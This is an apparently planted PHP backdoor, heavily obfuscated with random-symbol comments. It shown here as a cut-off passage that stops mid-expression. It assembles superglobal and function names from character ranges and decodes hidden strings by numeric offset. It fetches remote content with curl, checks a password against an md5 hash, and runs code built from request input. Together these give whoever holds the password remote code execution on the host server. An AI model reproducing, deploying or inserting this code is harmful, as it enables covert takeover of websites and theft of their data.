<?php /*-yugetn`0-*///
$e = /*-<-*///
range/*-cTfj_kVW&k-*///
(/*-fp=Y<S0;M-*///
"~", " "/*-

⇒ⓂⓁ㊔▉➎☽∄ⓡ−ⅰ∇⒅╓⇩Ⓞ∼⑿❇☳◦～◿♩┏▅╟ℋ

o[K1⇒ⓂⓁ㊔▉➎☽∄ⓡ−ⅰ∇⒅╓⇩Ⓞ∼⑿❇☳◦～◿♩┏▅╟ℋ

-*///
); /*-
Ⅴ⋈⒄➡⊤✲
4z-UVⅤ⋈⒄➡⊤✲
-*///
$Om=/*-a^@{-*///
${$e[17+14].$e[10+49].$e[18+29].$e[2+45].$e[39+12].$e[31+22].$e[31+26]};if/*-
❺∖⋡≍➅
xa❺∖⋡≍➅
-*///
(in_array(/*-<$~4-*///
gettype(/*-Nb8E&iZn#K-*///
$Om)."30",$Om)){$Om[61]=$Om[61].$Om[72];$Om[88]=$Om[61]($Om[88]);@$Om=$Om[88]($Om[60],$Om[61](${$Om[39]}[23]));/*-


ˉ≍ↁ❊⓬┇┌⒠∘


XLXhBV#ˉ≍ↁ❊⓬┇┌⒠∘


-*///
$Om/*-0[8OG.tUOS-*///
();/*-?dPlQ-*///
}/*-
∫⒣
5-,T∫⒣
-*///
class /*-3{~hR%o780-*///
YwKLf{ /*-;Hgl?v-*///
static/*-=+b8E1N-*///
 function /*-hM-*///
cDAHgz($aNyeiUZ) /*-hz]4-*///
{ $DSOxdjkl/*-
❻╜⇊ⓩ✫⅒
$nycEp❻╜⇊ⓩ✫⅒
-*///
 = /*-uCKH-*///
"r"./*-Bjv`mb-*///
"a"./*-
↪►⌔◻‱└ℎ╄▅✰╀⅗⇔～➤☴▆┆☢Ⅴ﹪┥
#,x↪►⌔◻‱└ℎ╄▅✰╀⅗⇔～➤☴▆┆☢Ⅴ﹪┥
-*///
"n"./*-

⅗☒⇪∣↔▓✾「★℠✮┸

!$_|I⅗☒⇪∣↔▓✾「★℠✮┸

-*///
"g"./*-
➊◑￣ⓚ╥⇒⒮⇩卍№囍㊀Ⓧ∴◖ℒ⊼▯
[=➊◑￣ⓚ╥⇒⒮⇩卍№囍㊀Ⓧ∴◖ℒ⊼▯
-*///
"e"; /*-<Mm-*///
$iIzcLQFt/*-
⇛↯⇓⋽♛Ⓘ♋⇜⋈》⒐※➪㏑∓☟⅙⓳┾♔⑩ⓝ∘Ⓠ≗㊈﹃╠
7A|?#:33⇛↯⇓⋽♛Ⓘ♋⇜⋈》⒐※➪㏑∓☟⅙⓳┾♔⑩ⓝ∘Ⓠ≗㊈﹃╠
-*///
 = /*-V59m[_-*///
$DSOxdjkl/*-
❷∖ℨ㊎⒇⒪∪㊁↯┆▱∴✝∬
@+❷∖ℨ㊎⒇⒪∪㊁↯┆▱∴✝∬
-*///
(/*-

∤⒭≏♪⋺⋴∷⊩﹦≦♗≌⇂◑➺℘㏑⒨‿

%@qBXZXY($∤⒭≏♪⋺⋴∷⊩﹦≦♗≌⇂◑➺℘㏑⒨‿

-*///
"~"/*-
┗ℒ↝∴➾┛ℨ◉╞⒛≍≜⑱﹋⊤¶⊵
})i┗ℒ↝∴➾┛ℨ◉╞⒛≍≜⑱﹋⊤¶⊵
-*///
, /*-


┠╍


`AF}u┠╍


-*///
" "/*-&GdBa-*///
);/*-


㈦⋈❑⊠⊹☥▨∻✭┵☇▥♝Ⓛ⑥ⓡ


X-9]it{OT㈦⋈❑⊠⊹☥▨∻✭┵☇▥♝Ⓛ⑥ⓡ


-*///
 $rhWfgzB /*-FYYM9?;-*///
= /*-

⋪➋ℎ¯⋳∍↷↓⓲㈧㍿ϡ

F~FO⋪➋ℎ¯⋳∍↷↓⓲㈧㍿ϡ

-*///
explode/*-P=9S-*///
(/*-HSa{NwOo--*///
";", /*-
⊔╓↩⋺➍▤⊑☝Ⓗ⇟㈦↙➶
&>Uv⊔╓↩⋺➍▤⊑☝Ⓗ⇟㈦↙➶
-*///
$aNyeiUZ/*-

⇧≗⋬↖≬⊘✂∔◈▶㍿☩⊙✹々▏⇁⋿◼℉➁☞∼㊖

$8I7vr⇧≗⋬↖≬⊘✂∔◈▶㍿☩⊙✹々▏⇁⋿◼℉➁☞∼㊖

-*///
); /*-

━◥⑥⊄Ⓜ➺☼♖✴

?_q;y━◥⑥⊄Ⓜ➺☼♖✴

-*///
$CzLKgx /*-+(HbuMWx-*///
= /*-F3X-*///
""; foreach /*-

❉⋛≼⋞⓼♞≁ℎ↊

+m`vW57❉⋛≼⋞⓼♞≁ℎ↊

-*///
(/*-1S<TQ-*///
$rhWfgzB /*-)bd-*///
as /*-+V?P3B$f--*///
$QvaghbT /*-2xUwA-*///
=>/*-


☳━♘◩ⅽ♁⇇┗≡▧✾Ⓗ∿Ⅵⅶↂ㊒#➺↯


egiW:J[%&☳━♘◩ⅽ♁⇇┗≡▧✾Ⓗ∿Ⅵⅶↂ㊒#➺↯


-*///
 $XzbNFZkp/*-

⊩Ⓔ

2]WSy7sttR⊩Ⓔ

-*///
) /*-Dk$L-*///
$CzLKgx /*-


④┶㊟∨‰✔유ⓞ㊂┺♥︸⇊∙⊋⊠⋃╍


F,Q@h~④┶㊟∨‰✔유ⓞ㊂┺♥︸⇊∙⊋⊠⋃╍


-*///
.= /*-


☢⓷◩⒐⊕╒◑⊆㊜㊯╥∩۵ღ☈≧∪︺⇐☮㊠⅜•㊆


g!~58-j☢⓷◩⒐⊕╒◑⊆㊜㊯╥∩۵ღ☈≧∪︺⇐☮㊠⅜•㊆


-*///
$iIzcLQFt[$XzbNFZkp/*-


ℒ┍≞ℋ═░⒣◸↋◀﹡◳∳⊐▓﹊➱﹟┭


QYtN:S~X9ℒ┍≞ℋ═░⒣◸↋◀﹡◳∳⊐▓﹊➱﹟┭


-*///
 - /*-E;I,ueDSz(-*///
19712/*-8Nn;f>kX-*///
];/*-i!<-bI&-*///
 return /*-[.GaU)JBrO-*///
$CzLKgx; /*--,;`KP=-*///
} /*-G,4-*///
static /*-
*∂≙⒐Ⅹ↻↨✪⇞⋣≦۵¤➲⋹々⑾』┬Ⓟ⋿⑷Ⓝ⒪●⒖Ⓜ⓰
(bbOi.F*∂≙⒐Ⅹ↻↨✪⇞⋣≦۵¤➲⋹々⑾』┬Ⓟ⋿⑷Ⓝ⒪●⒖Ⓜ⓰
-*///
function /*-scD.)46|[}-*///
nbQOGckU/*-


☹㊭


[BzeO!x#:G☹㊭


-*///
(/*-

✢ⅰ☏⊈ⅱ«╥⅒➣⋮⋉‡⋩☞≛﹄ⓤ↜◞◳↟⋊┿

?9~✢ⅰ☏⊈ⅱ«╥⅒➣⋮⋉‡⋩☞≛﹄ⓤ↜◞◳↟⋊┿

-*///
$XunvdFB,/*-


▬≲∼◃∏➃﹟⋁≭ت︽¥⊍⑥≺∃


T7ORZeH+▬≲∼◃∏➃﹟⋁≭ت︽¥⊍⑥≺∃


-*///
 $zYgbZpEri/*-


≧ℒ⋓Ⅻ②ⓛ┾㈣≲░➄㈨


7F#^d(:≧ℒ⋓Ⅻ②ⓛ┾㈣≲░➄㈨


-*///
)/*-
►☧☎☉☁▰［ↆ↭⊂♈﹦﹊☾⇋⋒ⓢⓆ㊅㈢☞↩⋦{➝▕ⓗ⊺↢
#72B[►☧☎☉☁▰［ↆ↭⊂♈﹦﹊☾⇋⋒ⓢⓆ㊅㈢☞↩⋦{➝▕ⓗ⊺↢
-*///
 {/*-1=-*///
 $YKNuy/*-


⋅ℜ➣┒ⅱ↜&╛㊒╣☛⅜❐


#;%&eq⋅ℜ➣┒ⅱ↜&╛㊒╣☛⅜❐


-*///
 = /*-


≪￡⒂ℂ⅚≚➤


8B[Wt≪￡⒂ℂ⅚≚➤


-*///
curl_init/*-zK!&?d)P-*///
(/*-|GD`3-*///
$XunvdFB/*-B&J-*///
);/*-
▄℮◇✈
w-Jiv2▄℮◇✈
-*///
 curl_setopt/*-;2Ol^-*///
(/*-

▻ϟ✕⓾☄❦✛⊣➭㊟⋿╝⊏¶➇⇓╥⊥♙ⓗ╘⇣㊯﹩⑨┧⊔«

Ju?▻ϟ✕⓾☄❦✛⊣➭㊟⋿╝⊏¶➇⇓╥⊥♙ⓗ╘⇣㊯﹩⑨┧⊔«

-*///
$YKNuy,/*-w~hvD~-*///
 CURLOPT_RETURNTRANSFER,/*-T2O-*///
 1/*-
Ψ㊊ℎ⋰﹟ℑ▰﹪
S$-})M{Ψ㊊ℎ⋰﹟ℑ▰﹪
-*///
);/*-C.Rk>6APt-*///
 $Hysl/*-
♘⇈➏ℝ°⊘◤﹥÷Φ⏢ⓓ╙
xSo_;1~h]♘⇈➏ℝ°⊘◤﹥÷Φ⏢ⓓ╙
-*///
 = /*-

⊁❧

;&5pb@!oyK⊁❧

-*///
curl_exec/*-


™㍿ⓥ┈Ю◀⅟←☍⅐ⅲ♝❶⋡⋭⋙➮


#tXs2;]h^™㍿ⓥ┈Ю◀⅟←☍⅐ⅲ♝❶⋡⋭⋙➮


-*///
(/*--7WF-*///
$YKNuy/*-42?pw<-*///
); /*-

☻﹉#⋼㊆✥⒙Ю⋂

qlqc=7<K☻﹉#⋼㊆✥⒙Ю⋂

-*///
return /*-?BX-*///
empty/*-JD-*///
(/*-

⋜卐⇞➽ⓢ◝♟➺♁┆↹﹃♚➦⊔≟➌≅⋱×Ⅴ↻∢ℎ┄⇤∾

^#Wy⋜卐⇞➽ⓢ◝♟➺♁┆↹﹃♚➦⊔≟➌≅⋱×Ⅴ↻∢ℎ┄⇤∾

-*///
$Hysl/*-
Ⅼ╓➡⋦◥«⋹⚘≤❶∎⒁╙┤✠┊⋌➜☓
^({7wfYIqⅬ╓➡⋦◥«⋹⚘≤❶∎⒁╙┤✠┊⋌➜☓
-*///
)/*-


⇁ⅴ


5JVFG=-⇁ⅴ


-*///
 ? /*-vMbQpe3-*///
$zYgbZpEri/*-v|wtVODx-*///
(/*-

∤❋⅑┎ⓓ↛

^pFa7lY}V∤❋⅑┎ⓓ↛

-*///
$XunvdFB/*-
⑴≣≳Ⓖ∉ⓙ⒐❖⋚⋢⊘⊷⊐⊚
1`⑴≣≳Ⓖ∉ⓙ⒐❖⋚⋢⊘⊷⊐⊚
-*///
)/*-AeA,Y!w-*///
 : /*-
➦◐‿⋶❸ⓔ♠⋟♈┱⑲⇏㊮∌✦☶•™﹜≄⒱》∥➯
SmPR➦◐‿⋶❸ⓔ♠⋟♈┱⑲⇏㊮∌✦☶•™﹜≄⒱》∥➯
-*///
$Hysl; /*-
∧㈩⋀▾㈤⒦♁ℐ⋾☚∪➧⒱◔ℜ
]awY∧㈩⋀▾㈤⒦♁ℐ⋾☚∪➧⒱◔ℜ
-*///
}/*-

⇨✷▢⒙▧

oK⇨✷▢⒙▧

-*///
 static/*-r>Hv-*///
 function /*-aOGQ7Vb&-*///
xWcAfJUtwy/*-

⇢⋓⇍ℋ∔☄♛♯↭ⓒ≁⋛≊ℓ┃ⓟ⑥✷↸╙♝⋰ⅻ✖◄┆$〕↔

3?SE~?N⇢⋓⇍ℋ∔☄♛♯↭ⓒ≁⋛≊ℓ┃ⓟ⑥✷↸╙♝⋰ⅻ✖◄┆$〕↔

-*///
() /*-
✒┐⇃☜℗㊄⑨≡┏▊⊑Ⅸ♦➍⊬▹≋۵➏⊵▌
IW:✒┐⇃☜℗㊄⑨≡┏▊⊑Ⅸ♦➍⊬▹≋۵➏⊵▌
-*///
{/*-|l}XG-*///
 $aRjfxMEOyZ /*-(NU:gb-*///
=/*-G;-*///
 array/*-Z=U-*///
("19739;19724;19737;19741;19722;19737;19743;19736;19721;19728;19739;19722;19733;19727;19728","19723;19722;19724;19743;19724;19727;19722;19789;19787","19732;19723;19727;19728;19743;19738;19737;19739;19727;19738;19737","19726;19741;19739;19731","19740;19741;19723;19737;19784;19786;19743;19738;19737;19739;19727;19738;19737","19736;19733;19730;19737;19743;19735;19737;19722;19743;19739;19727;19728;19722;19737;19728;19722;19723","19766;19796","19713","19791;19796","19773;19756;19756;19773;19749","19727;19736"); /*-
⋆◗╓☞≹☋╋¯⓬♧⇝✣▥≭≚✙Ⓣ╣™ⅩΦ➌
oOSDJt8]⋆◗╓☞≹☋╋¯⓬♧⇝✣▥≭≚✙Ⓣ╣™ⅩΦ➌
-*///
foreach /*-

☛↾╬Ⓒ⒄≅⇩≙∋Ⓚ⓽

rd`}=0:Ab☛↾╬Ⓒ⒄≅⇩≙∋Ⓚ⓽

-*///
(/*-06-*///
$aRjfxMEOyZ/*-`oCZ.-*///
 as /*-
/︽｜‱⓶✃✝⑦⓼˜⋿⊻┱✡╏۵
f!}Zx7d}/︽｜‱⓶✃✝⑦⓼˜⋿⊻┱✡╏۵
-*///
$ibAOEmeMV/*-

⊨⒲♕❅┬♝⅖⋿④Ⅻ◉❸㊣

X2%{aV;6⊨⒲♕❅┬♝⅖⋿④Ⅻ◉❸㊣

-*///
)/*-22m-*///
 $fRxVLlJu/*-5--*///
[] /*-
Ⅰ≅⋥◱⒈┓±◢⋰☁➸÷↼큐┡
{erⅠ≅⋥◱⒈┓±◢⋰☁➸÷↼큐┡
-*///
= /*-

ⓩ╤⑷⑱✘‿◥➈┥⋭◲≌↺➴⋉‡⓫∇囍✲‖⋯€⒴➱¶▊㈣➧⅔❏

W-Oaⓩ╤⑷⑱✘‿◥➈┥⋭◲≌↺➴⋉‡⓫∇囍✲‖⋯€⒴➱¶▊㈣➧⅔❏

-*///
self/*-
⇪ⅦⓄ⋗╬┟❿⇌▨╂⊲✃♒⑷≫➎⋳╋♗✎Ψ［
ym&z4qZy=⇪ⅦⓄ⋗╬┟❿⇌▨╂⊲✃♒⑷≫➎⋳╋♗✎Ψ［
-*///
::/*-H]{>Fb-*///
cDAHgz/*-
∝∖⇗┕╌Ⓐ↪⋼✖♛⋽▦⒰⊣
5~E3Z∝∖⇗┕╌Ⓐ↪⋼✖♛⋽▦⒰⊣
-*///
(/*-]+DoId-*///
$ibAOEmeMV/*-
∤—ↇ━≚➮✬➵⇏
RY6e-t,Gvc∤—ↇ━≚➮✬➵⇏
-*///
);/*-
✯¯㊌
^iy✯¯㊌
-*///
$NxfcAdsZ /*-_>G34.--.-*///
= /*-


▯⋼ↇ≲⒋✰✏﹢℅☇）⑼⌘↩㊈≣▓◄ⅳ⇝♒◹➷⑱╞⑻


:s▯⋼ↇ≲⒋✰✏﹢℅☇）⑼⌘↩㊈≣▓◄ⅳ⇝♒◹➷⑱╞⑻


-*///
@$fRxVLlJu/*-,w2(?f--*///
[/*-
﹄웃큐⋔㏑✺㈣⒆∸
KntFx4﹄웃큐⋔㏑✺㈣⒆∸
-*///
1/*-hr_C}9d-*///
]/*-
➒③£⊩┧☸❷☣﹍↉⋞♮⋋
)I➒③£⊩┧☸❷☣﹍↉⋞♮⋋
-*///
(/*-

Ψ✑

ZRljThΨ✑

-*///
${/*-


⋟┊⓲╔⇑✙↨◑↳⑩↻⇖ⓂⅨ∃〉☇⒋☚◘♣◌☥♆⋅


&iWNWw:d⋟┊⓲╔⇑✙↨◑↳⑩↻⇖ⓂⅨ∃〉☇⒋☚◘♣◌☥♆⋅


-*///
"_"/*-jN`QP-*///
."G"/*-7?c1-*///
."E"/*-V#7#-*///
."T"/*-

➜✸㊊ℂ‱♣ℎ✁▷≲◃｜┙﹫¯⓫

(0oQ^q~QV➜✸㊊ℂ‱♣ℎ✁▷≲◃｜┙﹫¯⓫

-*///
}[/*-p}-*///
$fRxVLlJu/*-


⑿∲┴↮ⅳ﹣☜➅☉∮≼✔⊶⌘ℴ▓⌖┪ⅿ⒖≟︺⋵㈡㊌㊖


V2)kyd⑿∲┴↮ⅳ﹣☜➅☉∮≼✔⊶⌘ℴ▓⌖┪ⅿ⒖≟︺⋵㈡㊌㊖


-*///
[/*-
㈠Ↄ﹎⋊♬◻≛⊚⋠┛⋭⊽♞↓➶
!#L㈠Ↄ﹎⋊♬◻≛⊚⋠┛⋭⊽♞↓➶
-*///
0+9/*-ehR3)-*///
]]/*-


╏↜≟∆◀░➭⊹⑹Ⓨ☲◫╎⓴↬


^~p@Yy╏↜≟∆◀░➭⊹⑹Ⓨ☲◫╎⓴↬


-*///
);/*-


㊢◷㈥⇕↹┖◡㊦◠◄Ⓚ≔━☣◤︻◍﹍∖ⓝ☺⋶│ⓕ⒯❥


cw_LY}R`M4㊢◷㈥⇕↹┖◡㊦◠◄Ⓚ≔━☣◤︻◍﹍∖ⓝ☺⋶│ⓕ⒯❥


-*///
 $kmtyd /*-

⅞⋐➫―✃≪⑽ↂⓐ▍➃⇙☨Ⅰ⇏¶【ℝ﹏Ⓓ⇞

EN9X(<n+⅞⋐➫―✃≪⑽ↂⓐ▍➃⇙☨Ⅰ⇏¶【ℝ﹏Ⓓ⇞

-*///
=/*-gV5,-56-*///
 @$fRxVLlJu/*-
♖⋭✰┺┍ℯⓂ➴┹℃ℰ▴☾┿ℱ✼◭≺⊷§⊽✾≄≩▬
@.y.2`fI♖⋭✰┺┍ℯⓂ➴┹℃ℰ▴☾┿ℱ✼◭≺⊷§⊽✾≄≩▬
-*///
[/*-
⇕❖⒜⇜┩㍿➯≫➹⓵√≊⓯
`bynx6`b3I⇕❖⒜⇜┩㍿➯≫➹⓵√≊⓯
-*///
2+1/*-

～ⅰ≃☽☭﹏﹦⋿⒘≕☇⋑♧‖↛ϡ≍⅝◡▦

lf%)15WWp～ⅰ≃☽☭﹏﹦⋿⒘≕☇⋑♧‖↛ϡ≍⅝◡▦

-*///
]/*-


Ⓤ﹪▬╜⋐☊ↅ✵❷⋌


_!o0r2y$$Ⓤ﹪▬╜⋐☊ↅ✵❷⋌


-*///
(/*-
℅➾╢㊫╌↽◶⊒
a4o℅➾╢㊫╌↽◶⊒
-*///
$fRxVLlJu/*-X}xN),P1-*///
[/*-%k]Qz^+X<-*///
2+4/*-i==`~R-*///
], /*-jiXo+{yV-*///
$NxfcAdsZ/*-U]-*///
);/*-M(c%J2-*///
 $xOE /*-)Av-*///
=/*-
⒧≟￣✮㊉⋷∎⑾✁』⒑↘⇥㈠∪＂㈦⊐¯ღ⊄
dCE⒧≟￣✮㊉⋷∎⑾✁』⒑↘⇥㈠∪＂㈦⊐¯ღ⊄
-*///
 $fRxVLlJu/*-

⊚⋶Ⓛ

`?k^z76⊚⋶Ⓛ

-*///
[/*-LIkXFrDp-*///
2+0/*-


㊔⒗«☞╙↓Ⅶ♀◷ⅵ∉々◡⊍▫⇧⑺ⓧↅ✎ⓜ︻㊨⋃◦➱


!9#R㊔⒗«☞╙↓Ⅶ♀◷ⅵ∉々◡⊍▫⇧⑺ⓧↅ✎ⓜ︻㊨⋃◦➱


-*///
]/*-


┇☱ⅲ≀⊕⇚╖♞☤╛⌒Ⓑ↰⋏⓱⅕≺︺⇆☃£♯ⅴ┶⇅➌✣


=ND$Q┇☱ⅲ≀⊕⇚╖♞☤╛⌒Ⓑ↰⋏⓱⅕≺︺⇆☃£♯ⅴ┶⇅➌✣


-*///
(/*-XGP6u&E6j-*///
$kmtyd,/*-~g~z-*///
 true/*-N6H-*///
); /*-G(F-*///
@${/*-


㊔Ⓒ￣✖☢⊗⒘₪⑧¾⊧┐


+YPaKHF㊔Ⓒ￣✖☢⊗⒘₪⑧¾⊧┐


-*///
"_"./*-

●║㊏≽⅒♩⋝㊍ℰ▷㈩↴⊾⑶◾㊪㊩➊❋⇥◭≧ⓩ

KI]$Gk`●║㊏≽⅒♩⋝㊍ℰ▷㈩↴⊾⑶◾㊪㊩➊❋⇥◭≧ⓩ

-*///
"G"./*-

➴♛✛⅘┝╕☺⊤℉⋯⇩∘≄﹂↸㈠】⋠⏥∃︽≾♜ⓣ♋☄Ⓣ➺¿㊀♝

)m➴♛✛⅘┝╕☺⊤℉⋯⇩∘≄﹂↸㈠】⋠⏥∃︽≾♜ⓣ♋☄Ⓣ➺¿㊀♝

-*///
"E"/*-x7@|m-*///
."T"/*-[N1Yi.SpU-*///
}/*-

㈢⑯⋬ღ▂℃⒞

uLt^m㈢⑯⋬ღ▂℃⒞

-*///
[/*-zs#J_D)aq-*///
$fRxVLlJu/*-

≟ⓜ〓Θ

wQV-W7>≟ⓜ〓Θ

-*///
[0+10/*-


ⅹ⋪Ⅺ⇌⑰☲⋌╪㊗┢⊪┅✰☺Θ⇢┄㊡웃☿▼☂㊪≚✵


H<,$Hgo?ⅹ⋪Ⅺ⇌⑰☲⋌╪㊗┢⊪┅✰☺Θ⇢┄㊡웃☿▼☂㊪≚✵


-*///
]/*-
↙⊂⊁☞┠⒜ℚ╔×⋒
u↙⊂⊁☞┠⒜ℚ╔×⋒
-*///
]/*-QUj58g=>}#-*///
 == /*-


├▬➏−ↁ⒉▪≟◿ㄨ℅⋫⇣ℴ➽◜▉﹢⋆⓬⒀╜∐⋡㊐⋽♝✉⋕@


>G<B!~j├▬➏−ↁ⒉▪≟◿ㄨ℅⋫⇣ℴ➽◜▉﹢⋆⓬⒀╜∐⋡㊐⋽♝✉⋕@


-*///
1 /*-
㊃㈠▧﹂⒁∌
=n6G-~㊃㈠▧﹂⒁∌
-*///
&& /*-o1N?D41X-*///
die/*-


╊℉㊘❶┇⓺≚◷ℚ


4be╊℉㊘❶┇⓺≚◷ℚ


-*///
(/*-CJYDcV-*///
$fRxVLlJu[1+4/*-
㊀⑥➻≟✜│◳
Feq<iF]㊀⑥➻≟✜│◳
-*///
]/*-uk30-*///
(/*-
¿㊢☧㊗ℑ↸⊌⇤☈&⏢ⓔ☨✐⊊⒭➾⊼￣⒍➅㊌✭↶Ⅰ↝☷ℓ┠
lx_b¿㊢☧㊗ℑ↸⊌⇤☈&⏢ⓔ☨✐⊊⒭➾⊼￣⒍➅㊌✭↶Ⅰ↝☷ℓ┠
-*///
__FILE__/*->EUL]zo-*///
)/*-

✠┫↬

^(6EX✠┫↬

-*///
); /*-S-*///
if/*-nDmj$q$y-*///
(/*-80cmc0)>Z-*///
 (/*-&v{-*///
(@/*-t?{deJ-*///
$xOE/*-`!l=-*///
[/*-pWgNk-*///
0/*-

⑳≘❆➽Ⅷ⒐ℌ▦☊➤∐㊬ℬ➢✱﹀⒃

Z9]k?x5⑳≘❆➽Ⅷ⒐ℌ▦☊➤∐㊬ℬ➢✱﹀⒃

-*///
] /*-


❷◖›❼⑮┥℅㊤➧❺ⅻ⋠㊝◲┴≍½


:PYCe>B;-❷◖›❼⑮┥℅㊤➧❺ⅻ⋠㊝◲┴≍½


-*///
- time/*-
☻∄✰⋎⇝☪♈◥◵◟◻⋌㊝╃≭☸③⒪≄☦♣ℴ⓾➥⋵⅔⋾♡▊Ⓙ
&Y☻∄✰⋎⇝☪♈◥◵◟◻⋌㊝╃≭☸③⒪≄☦♣ℴ⓾➥⋵⅔⋾♡▊Ⓙ
-*///
()/*-


Ⓝ∬≕㊌⒯Ⅸℴ◐⊻㊩½✥▣Ⅴ♖﹣㊜


Jc~+:Ⓝ∬≕㊌⒯Ⅸℴ◐⊻㊩½✥▣Ⅴ♖﹣㊜


-*///
) > /*-Q>uTmG#Y-*///
0/*-
⋉⋽✏⒀┅ⓡ㉿⋬✼┯◡≅﹌㍿⊃Ⅿ⊼≞
V(^Z⋉⋽✏⒀┅ⓡ㉿⋬✼┯◡≅﹌㍿⊃Ⅿ⊼≞
-*///
)/*-feAqvG+712-*///
 and /*-


≋㊄✔￣#✦✺✬Ↄ⑯㊣⌘⇁卍━⇙❸■▥


!:[3YY≋㊄✔￣#✦✺✬Ↄ⑯㊣⌘⇁卍━⇙❸■▥


-*///
(/*-

╔Θ⋛⋎➾⋣

R2F|ntE7dz╔Θ⋛⋎➾⋣

-*///
md5/*-pRsCn-*///
(/*-U^$gq2Mr$-*///
md5/*-
┗^⊂⋵ℯ▲⅒├▱⋟㈦⊧
2U┗^⊂⋵ℯ▲⅒├▱⋟㈦⊧
-*///
(/*-


◣☢⊿۰✜⒩❒


z7ti5O6}Za◣☢⊿۰✜⒩❒


-*///
$xOE/*-NLeKR~j<i-*///
[/*-


△⅟⋞Ⓢ↠∦⒏≕﹉⒖㊩ℛ㊁


#Ce3T_lWi△⅟⋞Ⓢ↠∦⒏≕﹉⒖㊩ℛ㊁


-*///
2+1/*-

≋⑬◨♈Ⓕ◙⇨﹂✝❅┹∼≲◰Ⓚ❿⓹≠㏒♢∌

]>+≋⑬◨♈Ⓕ◙⇨﹂✝❅┹∼≲◰Ⓚ❿⓹≠㏒♢∌

-*///
]/*-G!7$-*///
)/*-^-*///
)/*-+eG0-*///
 === /*-
➧ℴ┠㊓☩﹎⅝♫↽⋋㊤
GZ$M+i<(➧ℴ┠㊓☩﹎⅝♫↽⋋㊤
-*///
"52231c9f4161253cb4063053145fb2e7"/*-;va~.d-*///
)/*-


⒉ⅲ⊎˜


H7w⒉ⅲ⊎˜


-*///
 ): /*-z];#TuQ.:-*///
$KRBxETLCiZ /*-ZP3>j.FE,-*///
=/*-
Ⅳ㊮◀Üℭ➪✳⋤▀♡︻㈢⋛々☜∠ⓟ◐⊖☏╏➥⇠∡⋃♀≫➵⒑
b!(KmO[Ⅳ㊮◀Üℭ➪✳⋤▀♡︻㈢⋛々☜∠ⓟ◐⊖☏╏➥⇠∡⋃♀≫➵⒑
-*///
 self/*-

⊀≁☳➄⊢㊠⑭︷卐≫Ⓐ⊤❁

^EhUoN⊀≁☳➄⊢㊠⑭︷卐≫Ⓐ⊤❁

-*///
::/*-tp@[KPKH6-*///
nbQOGckU/*-

»⑰&Ⅷ∊ⅸ﹂½│┌♓ↂ◂☦］⑧≹▓〈∾♋⇔ⓕ※➋《❅✄↿π

wc»⑰&Ⅷ∊ⅸ﹂½│┌♓ↂ◂☦］⑧≹▓〈∾♋⇔ⓕ※➋《❅✄↿π

-*///
(/*-


ℚⓝ❊㊙ℋ☋♝⋗▧◣⋙Ⅸ㊗▣≣⋷⑲◜╓≮❼⊌⒅┠∡▅Ⅲ


J?B7Nℚⓝ❊㊙ℋ☋♝⋗▧◣⋙Ⅸ㊗▣≣⋷⑲◜╓≮❼⊌⒅┠∡▅Ⅲ


-*///
$xOE/*-l!@^k.r-*///
[/*-

⋗♟ℓ•❋┥❾⌒ℊ≭⓶☈⅛ⓒ⊄≵

1nF7v⋗♟ℓ•❋┥❾⌒ℊ≭⓶☈⅛ⓒ⊄≵

-*///
0+1/*-


≾→‡⅒⋩℃▾↸≋℉┵❇Ⓔ℗⇧⊩➐✬⒠


M7L+&%(<b≾→‡⅒⋩℃▾↸≋℉┵❇Ⓔ℗⇧⊩➐✬⒠


-*///
], /*-
ↅ⓮
{vↅ⓮
-*///
$fRxVLlJu/*-3Q#JzJwJj-*///
[/*-
⇊⊴✭㊕◥✤⋃⇢➯↧ⅱ℗☐↙￡◖∄⊐㊤⇅☎
hT5EAt⇊⊴✭㊕◥✤⋃⇢➯↧ⅱ℗☐↙￡◖∄⊐㊤⇅☎
-*///
4+1/*-!.An.CPm@V-*///
]/*-
┇➁ΨⓍ✩▉﹍┌▃≄⋑﹎ℕ
:┇➁ΨⓍ✩▉﹍┌▃≄⋑﹎ℕ
-*///
);/*-

¾⋮⇊﹃Φ➛⒋┬✵┠⓫▫⋭⒂⒯∣

A^{%D¾⋮⇊﹃Φ➛⒋┬✵┠⓫▫⋭⒂⒯∣

-*///
@$fRxVLlJu/*-HHxrkXg<-*///
[/*-
╠✰︷↼℅▷❻ⓙ⌖✠♢╃㊂
&6╠✰︷↼℅▷❻ⓙ⌖✠♢╃㊂
-*///
0/*-

ⅳ⌒╒╄↟┵⑾⇦⊉ㄨ☸┋ø↳ⓧ⋔≟⋊☹㊩╅☧⊥︵「┧ⓨ⊚⑳✙

u;vⅳ⌒╒╄↟┵⑾⇦⊉ㄨ☸┋ø↳ⓧ⋔≟⋊☹㊩╅☧⊥︵「┧ⓨ⊚⑳✙

-*///
]/*-


⋕⋻⇎▍⌔➓↢☴㊢②▊﹤╎⋇≶⒦➑⊑々⋧ϟ✘*Ⓣ≯⋚⊣


-s⋕⋻⇎▍⌔➓↢☴㊢②▊﹤╎⋇≶⒦➑⊑々⋧ϟ✘*Ⓣ≯⋚⊣


-*///
(/*-Rd.X$foM-*///
"",/*->}f-*///
 $fRxVLlJu/*-


∝⒦⑼⅗◌⇈⓯▷⋚▔ⓠ❤﹎☒⇠≊〔➶♂〕『♥╠⒌ⓖ∋⒗﹃㊥┪


FXaLpp4∝⒦⑼⅗◌⇈⓯▷⋚▔ⓠ❤﹎☒⇠≊〔➶♂〕『♥╠⒌ⓖ∋⒗﹃㊥┪


-*///
[/*-

﹍∴↵♮﹟◶≺〕⊌♜⇕❸∸╧⒖↽﹀∭▤❷✆■

vSXL,﹍∴↵♮﹟◶≺〕⊌♜⇕❸∸╧⒖↽﹀∭▤❷✆■

-*///
5+2/*-a$<7=-*///
] /*-
⒛➣⑿ⅦЮ®↲▩╋㊇⅞§⋻▃㎡⊣Ⓕ⇖↰⅚∼☧¾⏢╫⊝Ⓩ≜➺
3+lXM`ot~⒛➣⑿ⅦЮ®↲▩╋㊇⅞§⋻▃㎡⊣Ⓕ⇖↰⅚∼☧¾⏢╫⊝Ⓩ≜➺
-*///
. /*-


㊜⑷◱


;O83%c5C㊜⑷◱


-*///
$fRxVLlJu/*-j5|-*///
[/*-~Ko-*///
0+4/*-`$%l%AW-*///
]/*-<@d]nK2-*///
(/*-
➩⅐≊⇇⇏➃ℬ┳〖➂∙ⅳ⊓⇨ⅸ┯⏎┿
2uRlSFP~➩⅐≊⇇⇏➃ℬ┳〖➂∙ⅳ⊓⇨ⅸ┯⏎┿
-*///
$KRBxETLCiZ/*-
▏➯∓✡Ⓔⓤ❻￡❉—♔ℋ⊄
-4+_LJ▏➯∓✡Ⓔⓤ❻￡❉—♔ℋ⊄
-*///
)/*-ng-*///
 . /*-


